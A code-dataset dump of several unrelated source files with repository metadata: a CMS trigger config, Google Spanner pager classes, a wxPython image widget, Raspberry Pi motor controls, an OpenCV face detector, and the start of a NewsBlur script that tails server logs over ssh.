process.VertexProducer.l1TracksInputTag = cms.InputTag("TTTracksFromTracklet", "Level1TTTracks")
# Path and EndPath definitions
process.L1simulation_step = cms.Path(process.SimL1Emulator)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.FEVTDEBUGHLToutput_step = cms.EndPath(process.FEVTDEBUGHLToutput)
############################################################
# L1 pf object
###########################################################
process.load("L1Trigger.Phase2L1ParticleFlow.pfTracksFromL1Tracks_cfi")
from L1Trigger.Phase2L1ParticleFlow.l1ParticleFlow_cff import *
process.l1pf = cms.Path(process.pfTracksFromL1Tracks+process.l1ParticleFlow)
############################################################
# L1 Tau object
############################################################
process.load("L1Trigger.Phase2L1Taus.L1PFTauProducer_cff")
process.L1PFTauProducer.min_pi0pt = cms.double(2.5);
process.L1PFTauProducer.L1PFObjects = cms.InputTag("l1pfProducer","PF")
process.L1PFTauProducer.L1Neutrals = cms.InputTag("l1pfProducer")
process.L1PFTauProducer.L1Clusters = cms.InputTag("l1pfProducer","PF")
process.L1PFTaus = cms.Path(process.L1PFTauProducer)
# L1 Tau Analyzer
process.load("L1Trigger.phase2L1TauAnalyzer.phase2L1TauAnalyzer_cfi")
process.analyzer = cms.Path(process.L1TauAnalyzer)
process.TFileService = cms.Service("TFileService",
fileName = cms.string("analyzer-grow-l1t.root"),
closeFileFast = cms.untracked.bool(True)
)
# Schedule definition
process.schedule = cms.Schedule(process.EcalEBtp_step,process.L1TrackTrigger_step,process.L1simulation_step,process.l1pf,process.L1PFTaus,process.analyzer,process.endjob_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion
#dump_file = open('dump.py','w')
#dump_file.write(process.dumpPython())
process.source.secondaryFileNames = cms.untracked.vstring(
"/store/relval/CMSSW_9_3_7/RelValZTT_14TeV/GEN-SIM-DIGI-RAW/PU25ns_93X_upgrade2023_realistic_v5_2023D17PU200-v1/10000/76A6C136-2E2D-E811-AA99-0242AC130002.root")
process.source.lumisToProcess = cms.untracked.VLuminosityBlockRange("1:48")
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(100))
# Input source
process.source.fileNames = cms.untracked.vstring($inputFileNames)
process.TFileService = cms.Service("TFileService",
fileName = cms.string("$outputFileName")
)
| [
"ojalvo@wisc.edu"
] | ojalvo@wisc.edu |
53f1e2f513a9735af030b686847f828c7d25a6f9 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/spanner/admin/database/v1/admin-database-v1-py/google/cloud/spanner_admin_database_v1/services/database_admin/pagers.py | 77fee41bb742a42304fa72cb45903814dd541b52 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,767 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.spanner_admin_database_v1.types import backup
from google.cloud.spanner_admin_database_v1.types import spanner_database_admin
from google.longrunning import operations_pb2 as operations # type: ignore
class ListDatabasesPager:
"""A pager for iterating through ``list_databases`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse` object, and
provides an ``__iter__`` method to iterate through its
``databases`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListDatabases`` requests and continue to iterate
through the ``databases`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., spanner_database_admin.ListDatabasesResponse],
request: spanner_database_admin.ListDatabasesRequest,
response: spanner_database_admin.ListDatabasesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabasesRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabasesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[spanner_database_admin.ListDatabasesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[spanner_database_admin.Database]:
for page in self.pages:
yield from page.databases
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatabasesAsyncPager:
"""A pager for iterating through ``list_databases`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse` object, and
provides an ``__aiter__`` method to iterate through its
``databases`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListDatabases`` requests and continue to iterate
through the ``databases`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[spanner_database_admin.ListDatabasesResponse]],
request: spanner_database_admin.ListDatabasesRequest,
response: spanner_database_admin.ListDatabasesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabasesRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabasesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[spanner_database_admin.ListDatabasesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[spanner_database_admin.Database]:
async def async_generator():
async for page in self.pages:
for response in page.databases:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupsPager:
"""A pager for iterating through ``list_backups`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse` object, and
provides an ``__iter__`` method to iterate through its
``backups`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListBackups`` requests and continue to iterate
through the ``backups`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., backup.ListBackupsResponse],
request: backup.ListBackupsRequest,
response: backup.ListBackupsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[backup.ListBackupsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[backup.Backup]:
for page in self.pages:
yield from page.backups
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupsAsyncPager:
"""A pager for iterating through ``list_backups`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``backups`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListBackups`` requests and continue to iterate
through the ``backups`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[backup.ListBackupsResponse]],
request: backup.ListBackupsRequest,
response: backup.ListBackupsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[backup.ListBackupsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[backup.Backup]:
async def async_generator():
async for page in self.pages:
for response in page.backups:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatabaseOperationsPager:
"""A pager for iterating through ``list_database_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse` object, and
provides an ``__iter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListDatabaseOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., spanner_database_admin.ListDatabaseOperationsResponse],
request: spanner_database_admin.ListDatabaseOperationsRequest,
response: spanner_database_admin.ListDatabaseOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabaseOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[spanner_database_admin.ListDatabaseOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[operations.Operation]:
for page in self.pages:
yield from page.operations
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatabaseOperationsAsyncPager:
"""A pager for iterating through ``list_database_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListDatabaseOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[spanner_database_admin.ListDatabaseOperationsResponse]],
request: spanner_database_admin.ListDatabaseOperationsRequest,
response: spanner_database_admin.ListDatabaseOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabaseOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[spanner_database_admin.ListDatabaseOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[operations.Operation]:
async def async_generator():
async for page in self.pages:
for response in page.operations:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupOperationsPager:
"""A pager for iterating through ``list_backup_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse` object, and
provides an ``__iter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListBackupOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., backup.ListBackupOperationsResponse],
request: backup.ListBackupOperationsRequest,
response: backup.ListBackupOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[backup.ListBackupOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[operations.Operation]:
for page in self.pages:
yield from page.operations
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupOperationsAsyncPager:
"""A pager for iterating through ``list_backup_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListBackupOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[backup.ListBackupOperationsResponse]],
request: backup.ListBackupOperationsRequest,
response: backup.ListBackupOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[backup.ListBackupOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[operations.Operation]:
async def async_generator():
async for page in self.pages:
for response in page.operations:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
d8b1f7b564f9c8a9889d070590faa58b2928a4d8 | c6d22cf128819af1d48d02972bb9296a1687b9bb | /venv/Lib/site-packages/pyface/ui/wx/image_widget.py | 2e50ff64cb90378c94caab22abc79b27e902d0f7 | [
"BSD-3-Clause"
] | permissive | GenomePhD/Bio1-HIV | 92808a1e7e6339da6d07190ba3e1a2071f3e8428 | b5059e7f121e4abb6888893f91f95dd79aed9ca4 | refs/heads/master | 2022-10-28T21:55:42.998205 | 2018-04-16T18:52:32 | 2018-04-16T18:52:32 | 129,792,081 | 0 | 1 | null | 2022-10-05T18:36:22 | 2018-04-16T19:03:26 | Python | UTF-8 | Python | false | false | 7,447 | py | #------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" A clickable/draggable widget containing an image. """
# Major package imports.
import wx
# Enthought library imports.
from traits.api import Any, Bool, Event
# Local imports.
from .widget import Widget
class ImageWidget(Widget):
""" A clickable/draggable widget containing an image. """
#### 'ImageWidget' interface ##############################################
# The bitmap.
bitmap = Any
# Is the widget selected?
selected = Bool(False)
#### Events ####
# A key was pressed while the tree is in focus.
key_pressed = Event
# A node has been activated (ie. double-clicked).
node_activated = Event
# A drag operation was started on a node.
node_begin_drag = Event
# A (non-leaf) node has been collapsed.
node_collapsed = Event
# A (non-leaf) node has been expanded.
node_expanded = Event
# A left-click occurred on a node.
node_left_clicked = Event
# A right-click occurred on a node.
node_right_clicked = Event
#### Private interface ####################################################
_selected = Any
###########################################################################
# 'object' interface.
###########################################################################
def __init__ (self, parent, **traits):
""" Creates a new widget. """
# Base class constructors.
super(ImageWidget, self).__init__(**traits)
# Add some padding around the image.
size = (self.bitmap.GetWidth() + 10, self.bitmap.GetHeight() + 10)
# Create the toolkit-specific control.
self.control = wx.Window(parent, -1, size=size)
self.control.__tag__ = 'hack'
self._mouse_over = False
self._button_down = False
# Set up mouse event handlers:
self.control.Bind(wx.EVT_ENTER_WINDOW, self._on_enter_window)
self.control.Bind(wx.EVT_LEAVE_WINDOW, self._on_leave_window)
self.control.Bind(wx.EVT_LEFT_DCLICK, self._on_left_dclick)
self.control.Bind(wx.EVT_LEFT_DOWN, self._on_left_down)
self.control.Bind(wx.EVT_LEFT_UP, self._on_left_up)
self.control.Bind(wx.EVT_PAINT, self._on_paint)
# Pens used to draw the 'selection' marker:
# ZZZ: Make these class instances when moved to the wx toolkit code.
self._selectedPenDark = wx.Pen(
wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DSHADOW), 1,
wx.PENSTYLE_SOLID
)
self._selectedPenLight = wx.Pen(
wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DHIGHLIGHT), 1,
wx.PENSTYLE_SOLID
)
return
###########################################################################
# Private interface.
###########################################################################
#### Trait event handlers #################################################
def _bitmap_changed(self, bitmap):
""" Called when the widget's bitmap is changed. """
if self.control is not None:
self.control.Refresh()
return
def _selected_changed(self, selected):
""" Called when the selected state of the widget is changed. """
if selected:
for control in self.GetParent().GetChildren():
if hasattr(control, '__tag__'):
if control.Selected():
control.Selected(False)
break
self.Refresh()
return
#### wx event handlers ####################################################
def _on_enter_window(self, event):
""" Called when the mouse enters the widget. """
if self._selected is not None:
self._mouse_over = True
self.Refresh()
return
def _on_leave_window(self, event):
""" Called when the mouse leaves the widget. """
if self._mouse_over:
self._mouse_over = False
self.Refresh()
return
def _on_left_dclick(self, event):
""" Called when the left mouse button is double-clicked. """
#print 'left dclick'
event.Skip()
return
def _on_left_down ( self, event = None ):
""" Called when the left mouse button goes down on the widget. """
#print 'left down'
if self._selected is not None:
self.CaptureMouse()
self._button_down = True
self.Refresh()
event.Skip()
return
def _on_left_up ( self, event = None ):
""" Called when the left mouse button goes up on the widget. """
#print 'left up'
need_refresh = self._button_down
if need_refresh:
self.ReleaseMouse()
self._button_down = False
if self._selected is not None:
wdx, wdy = self.GetClientSizeTuple()
x = event.GetX()
y = event.GetY()
if (0 <= x < wdx) and (0 <= y < wdy):
if self._selected != -1:
self.Selected( True )
elif need_refresh:
self.Refresh()
return
if need_refresh:
self.Refresh()
event.Skip()
return
def _on_paint ( self, event = None ):
""" Called when the widget needs repainting. """
wdc = wx.PaintDC( self.control )
wdx, wdy = self.control.GetClientSizeTuple()
bitmap = self.bitmap
bdx = bitmap.GetWidth()
bdy = bitmap.GetHeight()
wdc.DrawBitmap( bitmap, (wdx - bdx) / 2, (wdy - bdy) / 2, True )
pens = [ self._selectedPenLight, self._selectedPenDark ]
bd = self._button_down
if self._mouse_over:
wdc.SetBrush( wx.TRANSPARENT_BRUSH )
wdc.SetPen( pens[ bd ] )
wdc.DrawLine( 0, 0, wdx, 0 )
wdc.DrawLine( 0, 1, 0, wdy )
wdc.SetPen( pens[ 1 - bd ] )
wdc.DrawLine( wdx - 1, 1, wdx - 1, wdy )
wdc.DrawLine( 1, wdy - 1, wdx - 1, wdy - 1 )
if self._selected == True:
wdc.SetBrush( wx.TRANSPARENT_BRUSH )
wdc.SetPen( pens[ bd ] )
wdc.DrawLine( 1, 1, wdx - 1, 1 )
wdc.DrawLine( 1, 1, 1, wdy - 1 )
wdc.DrawLine( 2, 2, wdx - 2, 2 )
wdc.DrawLine( 2, 2, 2, wdy - 2 )
wdc.SetPen( pens[ 1 - bd ] )
wdc.DrawLine( wdx - 2, 2, wdx - 2, wdy - 1 )
wdc.DrawLine( 2, wdy - 2, wdx - 2, wdy - 2 )
wdc.DrawLine( wdx - 3, 3, wdx - 3, wdy - 2 )
wdc.DrawLine( 3, wdy - 3, wdx - 3, wdy - 3 )
return
#### EOF ######################################################################
| [
"stevetmat@users.noreply.github.com"
] | stevetmat@users.noreply.github.com |
ccbee1958de03e05a060ef308bfd12c5bb39aad3 | 3406282d9a3744b4fb7d522f468b79d8b9d2c353 | /code/basic.py | 81db51385aa4e9f3d9fac286aef50c03053343d1 | [
"MIT"
] | permissive | swy20190/AmazingCar | cfdc8ccd0530a86a8462503ef0ecabdefbe29243 | 50d429e281d0986e44cf767fe7c0db2c7acc136d | refs/heads/master | 2022-09-19T07:15:59.097923 | 2020-06-03T14:01:11 | 2020-06-03T14:01:11 | 265,777,170 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,969 | py | # this file contains basic functions of the car
import RPi.GPIO as GPIO
import time
PWMA = 18
AIN1 = 22
AIN2 = 27
PWMB = 23
BIN1 = 25
BIN2 = 24
def init():
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(AIN2, GPIO.OUT)
GPIO.setup(AIN1, GPIO.OUT)
GPIO.setup(PWMB, GPIO.OUT)
GPIO.setup(BIN1, GPIO.OUT)
GPIO.setup(BIN2, GPIO.OUT)
GPIO.setup(PWMB, GPIO.OUT)
def forward(speed, duration, l_m, r_m):
l_m.ChangeDutyCycle(speed)
GPIO.output(AIN2, False)
GPIO.output(AIN1, True)
r_m.ChangeDutyCycle(speed)
GPIO.output(BIN2, False)
GPIO.output(BIN1, True)
time.sleep(duration)
def backward(speed, duration, l_m, r_m):
l_m.ChangeDutyCycle(speed)
GPIO.output(AIN2, True)
GPIO.output(AIN1, False)
r_m.ChangeDutyCycle(speed)
GPIO.output(BIN2, True)
GPIO.output(BIN1, False)
time.sleep(duration)
def brake(duration, l_m, r_m):
l_m.ChangeDutyCycle(0)
GPIO.output(AIN2, False)
GPIO.output(AIN1, False)
r_m.ChangeDutyCycle(0)
GPIO.output(BIN2, False)
GPIO.output(BIN1, False)
time.sleep(duration)
# 差速转向
def turn(l_speed, r_speed, duration, l_m, r_m):
l_m.ChangeDutyCycle(l_speed)
GPIO.output(AIN2, False)
GPIO.output(AIN1, True)
r_m.ChangeDutyCycle(r_speed)
GPIO.output(BIN2, False)
GPIO.output(BIN1, True)
time.sleep(duration)
# 半径为1米的转向
def advanced_turn(direction, duration, l_m, r_m):
# 外侧轮转速
faster_speed = 94.102
# 内侧轮转速
slower_speed = 80.0
# 0为向左,1为向右
if direction == 0:
turn(l_speed=slower_speed, r_speed=faster_speed, duration=duration, l_m=l_m, r_m=r_m)
else:
turn(l_speed=faster_speed, r_speed=slower_speed, duration=duration, l_m=l_m, r_m=r_m)
if __name__ == '__main__':
init()
L_Motor = GPIO.PWM(PWMA, 100)
L_Motor.start(0)
R_Motor = GPIO.PWM(PWMB, 100)
R_Motor.start(0)
| [
"K201410109@163.com"
] | K201410109@163.com |
e372cbab3599b8a62170b6d118f9645cf650296f | ae33f5e297eec9a7550f9040e4ae79e0049f5d71 | /haar/facerec.py | c94e6cce9ad3cd32261a7fe3c31a7b27c1c4f913 | [] | no_license | tano297/facerec | 5d52a7681be371ab148e70892726a9589e785ff4 | 7677cf8819e47d93ece334b93602fef227984990 | refs/heads/master | 2021-01-25T06:46:08.208538 | 2017-06-26T14:47:11 | 2017-06-26T14:47:11 | 93,614,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,184 | py | #!/usr/bin/python
import numpy as np
import cv2
#video cap
cap = cv2.VideoCapture(0)
#pretrained cascade filters
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
while(cap.isOpened()):
# Capture frame-by-frame
ret, frame = cap.read()
if not ret:
print("No video! Exiting...")
exit()
# Our operations on the frame come here
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#search for faces' bounding boxes
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
#for each one, draw the rectangle and search for eyes
for (x,y,w,h) in faces:
#rect for face
cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = frame[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
# Display the resulting frame
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() | [
"tano.297@gmail.com"
] | tano.297@gmail.com |
cc47947af7cebae7fdc2b5543d4508a2c820c757 | cf74a48db45d0fa8c9ae58931a9368672d07fa19 | /utils/zgrep.py | b587690671719faa84d712598846558189a92885 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | razikallayi/NewsBlur | fdb7549d73dfd6765e2cf2e4007f1b9cfb39002f | a266d9f585400c506fa9727796a5dddba0e69ffb | refs/heads/master | 2021-01-18T08:12:02.738442 | 2015-05-27T00:58:45 | 2015-05-27T00:58:45 | 36,501,810 | 1 | 0 | null | 2015-05-29T12:01:58 | 2015-05-29T12:01:56 | null | UTF-8 | Python | false | false | 3,581 | py | #!/usr/bin/env python
import os
import time
import select
import subprocess
import sys
from optparse import OptionParser
from requests.exceptions import ConnectionError
sys.path.insert(0, '/srv/newsblur')
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import fabfile
NEWSBLUR_USERNAME = 'sclay'
IGNORE_HOSTS = [
'push',
]
def main(role="app", role2="work", command=None, path=None):
delay = 1
while True:
try:
streams = create_streams_for_roles(role, role2, command=command, path=path)
print " --- Loading %s App Log Tails ---" % len(streams)
read_streams(streams)
except UnicodeDecodeError: # unexpected end of data
print " --- Lost connections - Retrying... ---"
time.sleep(1)
continue
except ConnectionError:
print " --- Retrying in %s seconds... ---" % delay
time.sleep(delay)
delay += 1
continue
except KeyboardInterrupt:
print " --- End of Logging ---"
break
def create_streams_for_roles(role, role2, command=None, path=None):
streams = list()
hosts = fabfile.do(split=True)
found = set()
if not path:
path = "/srv/newsblur/logs/newsblur.log"
if not command:
command = "tail -f"
for hostname in (hosts[role] + hosts[role2]):
if isinstance(hostname, dict):
address = hostname['address']
hostname = hostname['name']
elif ':' in hostname:
hostname, address = hostname.split(':', 1)
elif isinstance(hostname, tuple):
hostname, address = hostname[0], hostname[1]
else:
address = hostname
if any(h in hostname for h in IGNORE_HOSTS): continue
if hostname in found: continue
if 'ec2' in hostname:
s = subprocess.Popen(["ssh",
"-i", os.path.expanduser(os.path.join(fabfile.env.SECRETS_PATH,
"keys/ec2.pem")),
address, "%s %s" % (command, path)], stdout=subprocess.PIPE)
else:
s = subprocess.Popen(["ssh", "-l", NEWSBLUR_USERNAME,
"-i", os.path.expanduser(os.path.join(fabfile.env.SECRETS_PATH,
"keys/newsblur.key")),
